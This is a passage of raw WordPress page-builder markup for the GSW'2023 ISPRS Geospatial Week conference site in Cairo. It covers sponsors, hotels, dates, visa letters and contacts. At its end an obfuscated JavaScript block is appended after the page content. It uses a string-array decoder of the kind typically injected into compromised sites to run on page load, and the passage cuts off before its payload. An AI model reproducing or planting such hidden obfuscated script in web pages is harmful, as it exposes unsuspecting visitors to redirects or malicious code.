36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688950524799{margin-top: 40px !important;}\"]<img class=\"alignnone size-medium wp-image-4987 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 